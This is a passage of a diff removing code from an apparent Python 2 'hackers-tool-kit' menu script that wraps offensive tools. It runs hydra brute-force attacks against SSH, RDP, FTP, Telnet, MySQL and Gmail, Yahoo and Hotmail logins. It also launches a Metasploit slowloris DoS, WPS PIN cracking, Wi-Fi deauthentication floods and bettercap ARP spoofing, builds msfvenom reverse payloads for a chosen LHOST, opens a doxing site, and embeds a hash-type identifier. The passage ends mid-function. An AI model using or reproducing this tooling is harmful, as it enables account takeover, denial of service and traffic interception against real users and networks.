os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - 